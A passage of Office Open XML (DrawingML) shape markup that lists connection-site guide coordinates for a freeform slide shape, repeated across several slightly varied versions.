              <a:gd name="connsiteX76" fmla="*/ 550862 w 1418883"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 550158 w 1418883"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 553601 w 1418883"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 561139 w 1418883"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 562810 w 1418883"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 580373 w 1418883"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 580798 w 1418883"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 582621 w 1418883"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 569456 w 1418883"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 569957 w 1418883"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 557557 w 1418883"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 542742 w 1418883"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 543407 w 1418883"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 534275 w 1418883"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 520884 w 1418883"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 493614 w 1418883"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 436228 w 1418883"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 385146 w 1418883"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 365240 w 1418883"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 355963 w 1418883"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 342924 w 1418883"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 348923 w 1418883"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 351535 w 1418883"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 327864 w 1418883"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 317751 w 1418883"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 301968 w 1418883"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 299426 w 1418883"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 300419 w 1418883"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 292225 w 1418883"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 273403 w 1418883"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 249960 w 1418883"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 203759 w 1418883"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 176070 w 1418883"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 175196 w 1418883"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 155991 w 1418883"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 169071 w 1418883"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 161813 w 1418883"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 147898 w 1418883"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 156205 w 1418883"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 157393 w 1418883"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 162078 w 1418883"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 154360 w 1418883"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 143666 w 1418883"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 132402 w 1418883"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 133858 w 1418883"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 136094 w 1418883"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 128723 w 1418883"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 98131 w 1418883"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 77081 w 1418883"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 76639 w 1418883"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 62310 w 1418883"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 47729 w 1418883"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 52740 w 1418883"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 38682 w 1418883"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 38363 w 1418883"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 17989 w 1418883"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 17237 w 1418883"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 160 w 1418883"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 535 w 1418883"/>
              <a:gd name="connsiteY134" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 111526 w 1418883"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 128553 w 1418883"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 120263 w 1418883"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 132547 w 1418883"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 92101 w 1418883"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 91951 w 1418733"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1418733 w 1418733"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1418733 w 1418733"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 155427 w 1418733"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 192020 w 1418733"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 203520 w 1418733"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 228259 w 1418733"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 205816 w 1418733"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 220907 w 1418733"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 238351 w 1418733"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 252391 w 1418733"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 305348 w 1418733"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 321035 w 1418733"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 364740 w 1418733"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 347963 w 1418733"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 325378 w 1418733"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 332542 w 1418733"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 315287 w 1418733"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 342315 w 1418733"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 320307 w 1418733"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 319105 w 1418733"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 334520 w 1418733"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 321907 w 1418733"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 307136 w 1418733"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 356648 w 1418733"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 335723 w 1418733"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 375315 w 1418733"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 422445 w 1418733"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 436013 w 1418733"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 451994 w 1418733"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 485487 w 1418733"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 495086 w 1418733"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 506312 w 1418733"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 507332 w 1418733"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 514673 w 1418733"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 517976 w 1418733"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 518960 w 1418733"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 514594 w 1418733"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 521271 w 1418733"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 518204 w 1418733"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 525034 w 1418733"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 532070 w 1418733"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 534801 w 1418733"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 531505 w 1418733"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 533059 w 1418733"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 539968 w 1418733"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 535824 w 1418733"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 551227 w 1418733"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 557130 w 1418733"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 561863 w 1418733"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 563156 w 1418733"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 560963 w 1418733"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 556443 w 1418733"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 551526 w 1418733"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 548091 w 1418733"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 528744 w 1418733"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 532817 w 1418733"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 518073 w 1418733"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 519222 w 1418733"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 517798 w 1418733"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 504093 w 1418733"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 505691 w 1418733"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 499113 w 1418733"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 500444 w 1418733"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 504798 w 1418733"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 509876 w 1418733"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 532470 w 1418733"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 531895 w 1418733"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 532202 w 1418733"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 532229 w 1418733"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 530844 w 1418733"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 529728 w 1418733"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 531461 w 1418733"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 535204 w 1418733"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 534670 w 1418733"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 543366 w 1418733"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 550712 w 1418733"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 550008 w 1418733"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 553451 w 1418733"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 560989 w 1418733"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 562660 w 1418733"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 580223 w 1418733"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 580648 w 1418733"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 582471 w 1418733"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 569306 w 1418733"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 569807 w 1418733"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 557407 w 1418733"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 542592 w 1418733"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 543257 w 1418733"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 534125 w 1418733"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 520734 w 1418733"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 493464 w 1418733"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 436078 w 1418733"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 384996 w 1418733"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 365090 w 1418733"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 355813 w 1418733"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 342774 w 1418733"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 348773 w 1418733"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 351385 w 1418733"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 327714 w 1418733"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 317601 w 1418733"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 301818 w 1418733"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 299276 w 1418733"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 300269 w 1418733"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 292075 w 1418733"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 273253 w 1418733"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 249810 w 1418733"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 203609 w 1418733"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 175920 w 1418733"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 175046 w 1418733"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 155841 w 1418733"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 168921 w 1418733"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 161663 w 1418733"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 147748 w 1418733"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 156055 w 1418733"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 157243 w 1418733"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 161928 w 1418733"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 154210 w 1418733"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 143516 w 1418733"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 132252 w 1418733"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 133708 w 1418733"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 135944 w 1418733"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 128573 w 1418733"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 97981 w 1418733"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 76931 w 1418733"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 76489 w 1418733"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 62160 w 1418733"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 47579 w 1418733"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 52590 w 1418733"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 38532 w 1418733"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 38213 w 1418733"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 17839 w 1418733"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 17087 w 1418733"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 10 w 1418733"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 127193 w 1418733"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 111376 w 1418733"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 128403 w 1418733"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 120113 w 1418733"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 132397 w 1418733"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 91951 w 1418733"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 76413 w 1403195"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1403195 w 1403195"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1403195 w 1403195"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 139889 w 1403195"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 176482 w 1403195"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 187982 w 1403195"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 212721 w 1403195"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 190278 w 1403195"/>
